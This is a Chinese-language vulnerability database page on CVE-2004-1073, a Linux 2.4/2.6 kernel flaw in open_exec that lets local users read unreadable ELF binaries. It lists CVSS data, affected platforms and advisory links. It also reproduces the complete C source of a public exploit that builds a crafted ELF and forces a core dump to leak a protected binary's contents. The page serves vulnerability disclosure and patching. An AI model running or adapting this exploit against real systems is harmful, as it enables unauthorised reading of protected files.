CVE-2004-1073
CVSS2.1
发布时间 :2005-01-10 00:00:00
修订时间 :2013-07-18 00:33:23
NMCOE    

[原文]The open_exec function in the execve functionality (exec.c) in Linux kernel 2.4.x up to 2.4.27, and 2.6.x up to 2.6.8, allows local users to read non-readable ELF binaries by using the interpreter (PT_INTERP) functionality.


[CNNVD]Linux Kernel execve() 信息泄露漏洞(CNNVD-200501-062)

        Linux Kernel是开源操作系统Linux所使用的内核。
        Linux kernl 2.4.x至2.4.27及2.6.x至2.6.8中exec.c的open_exec函数存在漏洞。
        本地用户可利用PT_INTERP,读取到不可读取的ELF二进制代码。

- CVSS (基础分值)

CVSS分值: 2.1 [轻微(LOW)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:trustix:secure_linux:1.5Trustix Secure Linux 1.5
cpe:/o:linux:linux_kernel:2.6.0:test2Linux Kernel 2.6 test2
cpe:/o:linux:linux_kernel:2.6.1Linux Kernel 2.6.1
cpe:/o:redhat:enterprise_linux:2.1::workstation_ia64
cpe:/o:redhat:enterprise_linux:2.1::advanced_server
cpe:/o:linux:linux_kernel:2.4.27Linux Kernel 2.4.27
cpe:/o:redhat:enterprise_linux:3.0::workstation_server
cpe:/o:linux:linux_kernel:2.4.24_ow1
cpe:/o:linux:linux_kernel:2.4.23:pre9Linux Kernel 2.4.23 pre9
cpe:/o:linux:linux_kernel:2.4.0:test3Linux Kernel 2.4.0 test3
cpe:/o:linux:linux_kernel:2.6.0:test1Linux Kernel 2.6 test1
cpe:/o:linux:linux_kernel:2.6.0:test11Linux Kernel 2.6 test11
cpe:/o:linux:linux_kernel:2.6.9:2.6.20
cpe:/o:redhat:enterprise_linux:2.1::advanced_server_ia64
cpe:/o:suse:suse_linux:8::enterprise_server
cpe:/o:linux:linux_kernel:2.6.0:test6Linux Kernel 2.6 test6
cpe:/o:trustix:secure_linux:2.0Trustix Secure Linux 2.0
cpe:/o:trustix:secure_linux:2.1Trustix Secure Linux 2.1
cpe:/o:linux:linux_kernel:2.4.12Linux Kernel 2.4.12
cpe:/o:linux:linux_kernel:2.4.0:test8Linux Kernel 2.4.0 test8
cpe:/o:suse:suse_linux:8.2SuSE SuSE Linux 8.2
cpe:/o:linux:linux_kernel:2.4.19:pre3Linux Kernel 2.4.19 pre3
cpe:/o:linux:linux_kernel:2.4.23_ow2
cpe:/o:linux:linux_kernel:2.4.3Linux Kernel 2.4.3
cpe:/o:trustix:secure_linux:2.2Trustix Secure Linux 2.2
cpe:/o:linux:linux_kernel:2.4.23Linux Kernel 2.4.23
cpe:/o:linux:linux_kernel:2.4.0:test10Linux Kernel 2.4.0 test10
cpe:/o:redhat:enterprise_linux:3.0::advanced_server
cpe:/o:suse:suse_linux:9.0::enterprise_server
cpe:/o:suse:suse_linux:8.1SuSE SuSE Linux 8.1
cpe:/o:linux:linux_kernel:2.4.0:test1Linux Kernel 2.4.0 test1
cpe:/o:suse:suse_linux:9.2SuSE SuSE Linux 9.2
cpe:/o:linux:linux_kernel:2.4.27:pre2Linux Kernel 2.4.27 pre2
cpe:/o:redhat:fedora_core:core_3.0
cpe:/o:linux:linux_kernel:2.6.8:rc3Linux Kernel 2.6.8 Release Candidate 3
cpe:/o:linux:linux_kernel:2.4.4Linux Kernel 2.4.4
cpe:/o:linux:linux_kernel:2.4.13Linux Kernel 2.4.13
cpe:/o:linux:linux_kernel:2.4.0:test12Linux Kernel 2.4.0 test12
cpe:/o:linux:linux_kernel:2.4.0:test2Linux Kernel 2.4.0 test2
cpe:/o:linux:linux_kernel:2.4.18:pre1Linux Kernel 2.4.18 pre1
cpe:/o:linux:linux_kernel:2.4.20Linux Kernel 2.4.20
cpe:/o:linux:linux_kernel:2.4.19:pre4Linux Kernel 2.4.19 pre4
cpe:/o:linux:linux_kernel:2.4.0:test4Linux Kernel 2.4.0 test4
cpe:/o:linux:linux_kernel:2.4.27:pre4Linux Kernel 2.4.27 pre4
cpe:/o:linux:linux_kernel:2.6.1:rc1Linux Kernel 2.6.1 Release Candidate 1
cpe:/o:linux:linux_kernel:2.4.27:pre5Linux Kernel 2.4.27 pre5
cpe:/o:linux:linux_kernel:2.6.1:rc2Linux Kernel 2.6.1 Release Candidate 2
cpe:/o:redhat:enterprise_linux:2.1::workstation
cpe:/o:linux:linux_kernel:2.4.21:pre7Linux Kernel 2.4.21 pre7
cpe:/o:linux:linux_kernel:2.6.0:test4Linux Kernel 2.6 test4
cpe:/o:linux:linux_kernel:2.6.0Linux Kernel 2.6.0
cpe:/o:linux:linux_kernel:2.4.22Linux Kernel 2.4.22
cpe:/o:linux:linux_kernel:2.6.6:rc1Linux Kernel 2.6.6 Release Candidate 1
cpe:/o:linux:linux_kernel:2.6.3Linux Kernel 2.6.3
cpe:/o:linux:linux_kernel:2.6.0:test8Linux Kernel 2.6 test8
cpe:/o:redhat:enterprise_linux_desktop:3.0Red Hat Desktop 3.0
cpe:/o:linux:linux_kernel:2.4.19:pre5Linux Kernel 2.4.19 pre5
cpe:/o:redhat:fedora_core:core_2.0
cpe:/o:linux:linux_kernel:2.4.21Linux Kernel 2.4.21
cpe:/o:linux:linux_kernel:2.6.0:test10Linux Kernel 2.6 test10
cpe:/o:linux:linux_kernel:2.4.0:test6Linux Kernel 2.4.0 test6
cpe:/o:linux:linux_kernel:2.4.25Linux Kernel 2.4.25
cpe:/o:linux:linux_kernel:2.4.1Linux Kernel 2.4.1
cpe:/o:linux:linux_kernel:2.6.7:rc1Linux Kernel 2.6.7 Release Candidate 1
cpe:/o:linux:linux_kernel:2.4.17Linux Kernel 2.4.17
cpe:/o:linux:linux_kernel:2.4.14Linux Kernel 2.4.14
cpe:/o:turbolinux:turbolinux_server:10.0
cpe:/o:linux:linux_kernel:2.6.0:test9Linux Kernel 2.6 test9
cpe:/o:redhat:linux_advanced_workstation:2.1::itanium_processor
cpe:/o:linux:linux_kernel:2.4.10Linux Kernel 2.4.10
cpe:/o:linux:linux_kernel:2.4.18:pre5Linux Kernel 2.4.18 pre5
cpe:/o:linux:linux_kernel:2.6.0:test5Linux Kernel 2.6 test5
cpe:/o:redhat:enterprise_linux:3.0::enterprise_server
cpe:/o:redhat:enterprise_linux:2.1::enterprise_server
cpe:/o:linux:linux_kernel:2.4.19:pre6Linux Kernel 2.4.19 pre6
cpe:/o:linux:linux_kernel:2.4.0:test7Linux Kernel 2.4.0 test7
cpe:/o:suse:suse_linux:1.0::desktop
cpe:/o:linux:linux_kernel:2.4.21:pre1Linux Kernel 2.4.21 pre1
cpe:/o:linux:linux_kernel:2.4.27:pre3Linux Kernel 2.4.27 pre3
cpe:/o:redhat:linux_advanced_workstation:2.1::ia64
cpe:/o:linux:linux_kernel:2.4.18:pre3Linux Kernel 2.4.18 pre3
cpe:/o:linux:linux_kernel:2.6.0:test7Linux Kernel 2.6 test7
cpe:/o:linux:linux_kernel:2.4.5Linux Kernel 2.4.5
cpe:/o:linux:linux_kernel:2.4.19:pre2Linux Kernel 2.4.19 pre2
cpe:/o:linux:linux_kernel:2.4.18::x86
cpe:/o:redhat:enterprise_linux:2.1::enterprise_server_ia64
cpe:/o:suse:suse_linux:9.0SuSE SuSE Linux 9.0
cpe:/o:linux:linux_kernel:2.6.5Linux Kernel 2.6.5
cpe:/o:linux:linux_kernel:2.6.7Linux Kernel 2.6.7
cpe:/o:linux:linux_kernel:2.4.18:pre7Linux Kernel 2.4.18 pre7
cpe:/o:linux:linux_kernel:2.4.0:test9Linux Kernel 2.4.0 test9
cpe:/o:linux:linux_kernel:2.4.2Linux Kernel 2.4.2
cpe:/o:linux:linux_kernel:2.4.0:test11Linux Kernel 2.4.0 test11
cpe:/o:linux:linux_kernel:2.6_test9_cvs
cpe:/o:linux:linux_kernel:2.4.16Linux Kernel 2.4.16
cpe:/o:linux:linux_kernel:2.4.27:pre1Linux Kernel 2.4.27 pre1
cpe:/o:linux:linux_kernel:2.4.6Linux Kernel 2.4.6
cpe:/o:linux:linux_kernel:2.4.24Linux Kernel 2.4.24
cpe:/o:linux:linux_kernel:2.4.7Linux Kernel 2.4.7
cpe:/o:linux:linux_kernel:2.6.4Linux Kernel 2.6.4
cpe:/o:linux:linux_kernel:2.4.18:pre4Linux Kernel 2.4.18 pre4
cpe:/o:linux:linux_kernel:2.4.11Linux Kernel 2.4.11
cpe:/o:linux:linux_kernel:2.6.8:rc2Linux Kernel 2.6.8 Release Candidate 2
cpe:/o:linux:linux_kernel:2.4.18:pre8Linux Kernel 2.4.18 pre8
cpe:/o:suse:suse_linux:9.1SuSE SuSE Linux 9.1
cpe:/o:linux:linux_kernel:2.4.19Linux Kernel 2.4.19
cpe:/o:linux:linux_kernel:2.4.18:pre6Linux Kernel 2.4.18 pre6
cpe:/o:linux:linux_kernel:2.4.21:pre4Linux Kernel 2.4.21 pre4
cpe:/o:linux:linux_kernel:2.4.9Linux Kernel 2.4.9
cpe:/o:linux:linux_kernel:2.4.18Linux Kernel 2.4.18
cpe:/o:linux:linux_kernel:2.4.8Linux Kernel 2.4.8
cpe:/o:linux:linux_kernel:2.4.0:test5Linux Kernel 2.4.0 test5
cpe:/o:linux:linux_kernel:2.6.2Linux Kernel 2.6.2
cpe:/o:suse:suse_linux:9.0::x86_64
cpe:/o:linux:linux_kernel:2.6.8:rc1Linux Kernel 2.6.8 Release Candidate 1
cpe:/o:linux:linux_kernel:2.4.19:pre1Linux Kernel 2.4.19 pre1
cpe:/o:linux:linux_kernel:2.4.18:pre2Linux Kernel 2.4.18 pre2
cpe:/o:linux:linux_kernel:2.4.26Linux Kernel 2.4.26
cpe:/o:linux:linux_kernel:2.6.0:test3Linux Kernel 2.6 test3
cpe:/o:linux:linux_kernel:2.6.8Linux Kernel 2.6.8
cpe:/o:linux:linux_kernel:2.6.6Linux Kernel 2.6.6
cpe:/o:linux:linux_kernel:2.4.0Linux Kernel 2.4.0
cpe:/o:linux:linux_kernel:2.4.15Linux Kernel 2.4.15

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:11503The open_exec function in the execve functionality (exec.c) in Linux kernel 2.4.x up to 2.4.27, and 2.6.x up to 2.6.8, allows local users to...
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1073
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-1073
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200501-062
(官方数据源) CNNVD

- 其它链接及资源

http://www.redhat.com/support/errata/RHSA-2004-549.html
(VENDOR_ADVISORY)  REDHAT  RHSA-2004:549
https://bugzilla.fedora.us/show_bug.cgi?id=2336
(UNKNOWN)  FEDORA  FLSA:2336
http://xforce.iss.net/xforce/xfdb/18025
(VENDOR_ADVISORY)  XF  linux-elf-setuid-gain-privileges(18025)
http://www.isec.pl/vulnerabilities/isec-0017-binfmt_elf.txt
(UNKNOWN)  MISC  http://www.isec.pl/vulnerabilities/isec-0017-binfmt_elf.txt
http://www.securityfocus.com/bid/11646
(UNKNOWN)  BID  11646
http://www.redhat.com/support/errata/RHSA-2006-0191.html
(UNKNOWN)  REDHAT  RHSA-2006:0191
http://www.redhat.com/support/errata/RHSA-2006-0190.html
(UNKNOWN)  REDHAT  RHSA-2006:0190
http://www.redhat.com/support/errata/RHSA-2005-293.html
(UNKNOWN)  REDHAT  RHSA-2005:293
http://www.redhat.com/support/errata/RHSA-2004-505.html
(UNKNOWN)  REDHAT  RHSA-2004:505
http://www.redhat.com/support/errata/RHSA-2004-504.html
(UNKNOWN)  REDHAT  RHSA-2004:504
http://www.mandriva.com/security/advisories?name=MDKSA-2005:022
(UNKNOWN)  MANDRAKE  MDKSA-2005:022
http://www.debian.org/security/2006/dsa-1082
(UNKNOWN)  DEBIAN  DSA-1082
http://www.debian.org/security/2006/dsa-1070
(UNKNOWN)  DEBIAN  DSA-1070
http://www.debian.org/security/2006/dsa-1069
(UNKNOWN)  DEBIAN  DSA-1069
http://www.debian.org/security/2006/dsa-1067
(UNKNOWN)  DEBIAN  DSA-1067
http://secunia.com/advisories/20338
(UNKNOWN)  SECUNIA  20338
http://secunia.com/advisories/20202
(UNKNOWN)  SECUNIA  20202
http://secunia.com/advisories/20163
(UNKNOWN)  SECUNIA  20163
http://secunia.com/advisories/20162
(UNKNOWN)  SECUNIA  20162
http://secunia.com/advisories/18684
(UNKNOWN)  SECUNIA  18684

- 漏洞信息

Linux Kernel execve() 信息泄露漏洞
低危 设计错误
2005-01-10 00:00:00 2005-10-20 00:00:00
本地  
        Linux Kernel是开源操作系统Linux所使用的内核。
        Linux kernl 2.4.x至2.4.27及2.6.x至2.6.8中exec.c的open_exec函数存在漏洞。
        本地用户可利用PT_INTERP,读取到不可读取的ELF二进制代码。

- 公告与补丁

        目前厂商已经发布了升级补丁以修复此安全问题,补丁获取链接:
        http://www.kernel.org/

- 漏洞信息 (624)

Linux Kernel (<= 2.4.27 , 2.6.8) binfmt_elf Executable File Read Exploit (EDBID:624)
linux local
2004-11-10 Verified
0 Paul Starzetz
N/A [点击下载]
/*
 *
 * binfmt_elf executable file read vulnerability
 *
 * gcc -O3 -fomit-frame-pointer elfdump.c -o elfdump
 *
 * Copyright (c) 2004 iSEC Security Research. All Rights Reserved.
 *
 * THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS"
 * AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION
 * WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED.
 *
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>

#include <sys/types.h>
#include <sys/resource.h>
#include <sys/wait.h>

#include <linux/elf.h>

#define BADNAME "/tmp/_elf_dump"

void usage(char *s)
{
        printf("\nUsage: %s executable\n\n", s);
        exit(0);
}

// ugly mem scan code :-)
static volatile void bad_code(void)
{
__asm__(
// "1: jmp 1b \n"
                " xorl %edi, %edi \n"
                " movl %esp, %esi \n"
                " xorl %edx, %edx \n"
                " xorl %ebp, %ebp \n"
                " call get_addr \n"

                " movl %esi, %esp \n"
                " movl %edi, %ebp \n"
                " jmp inst_sig \n"

                "get_addr: popl %ecx \n"

// sighand
                "inst_sig: xorl %eax, %eax \n"
                " movl $11, %ebx \n"
                " movb $48, %al \n"
                " int $0x80 \n"

                "ld_page: movl %ebp, %eax \n"
                " subl %edx, %eax \n"
                " cmpl $0x1000, %eax \n"
                " jle ld_page2 \n"

// mprotect
                " pusha \n"
                " movl %edx, %ebx \n"
                " addl $0x1000, %ebx \n"
                " movl %eax, %ecx \n"
                " xorl %eax, %eax \n"
                " movb $125, %al \n"
                " movl $7, %edx \n"
                " int $0x80 \n"
                " popa \n"

                "ld_page2: addl $0x1000, %edi \n"
                " cmpl $0xc0000000, %edi \n"
                " je dump \n"
                " movl %ebp, %edx \n"
                " movl (%edi), %eax \n"
                " jmp ld_page \n"

                "dump: xorl %eax, %eax \n"
                " xorl %ecx, %ecx \n"
                " movl $11, %ebx \n"
                " movb $48, %al \n"
                " int $0x80 \n"
                " movl $0xdeadbeef, %eax \n"
                " jmp *(%eax) \n"

        );
}

static volatile void bad_code_end(void)
{
}

int main(int ac, char **av)
{
struct elfhdr eh;
struct elf_phdr eph;
struct rlimit rl;
int fd, nl, pid;

        if(ac<2)
                usage(av[0]);

// make bad a.out
        fd=open(BADNAME, O_RDWR|O_CREAT|O_TRUNC, 0755);
        nl = strlen(av[1])+1;
        memset(&eh, 0, sizeof(eh) );

// elf exec header
        memcpy(eh.e_ident, ELFMAG, SELFMAG);
        eh.e_type = ET_EXEC;
        eh.e_machine = EM_386;
        eh.e_phentsize = sizeof(struct elf_phdr);
        eh.e_phnum = 2;
        eh.e_phoff = sizeof(eh);
        write(fd, &eh, sizeof(eh) );

// section header(s)
        memset(&eph, 0, sizeof(eph) );
        eph.p_type = PT_INTERP;
        eph.p_offset = sizeof(eh) + 2*sizeof(eph);
        eph.p_filesz = nl;
        write(fd, &eph, sizeof(eph) );

        memset(&eph, 0, sizeof(eph) );
        eph.p_type = PT_LOAD;
        eph.p_offset = 4096;
        eph.p_filesz = 4096;
        eph.p_vaddr = 0x0000;
        eph.p_flags = PF_R|PF_X;
        write(fd, &eph, sizeof(eph) );

// .interp
        write(fd, av[1], nl );

// execable code
        nl = &bad_code_end - &bad_code;
        lseek(fd, 4096, SEEK_SET);
        write(fd, &bad_code, 4096);
        close(fd);

// dump the shit
        rl.rlim_cur = RLIM_INFINITY;
        rl.rlim_max = RLIM_INFINITY;
        if( setrlimit(RLIMIT_CORE, &rl) )
                perror("\nsetrlimit failed");
        fflush(stdout);
        pid = fork();
        if(pid)
                wait(NULL);
        else
                execl(BADNAME, BADNAME, NULL);

        printf("\ncore dumped!\n\n");
        unlink(BADNAME);

return 0;
} 

// milw0rm.com [2004-11-10]
		

- 漏洞信息

11600
Linux Kernel ELF Binary Loader open_exec() Binary Read Permission Error
Exploit Public

- 漏洞描述

Unknown or Incomplete

- 时间线

2004-11-10 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站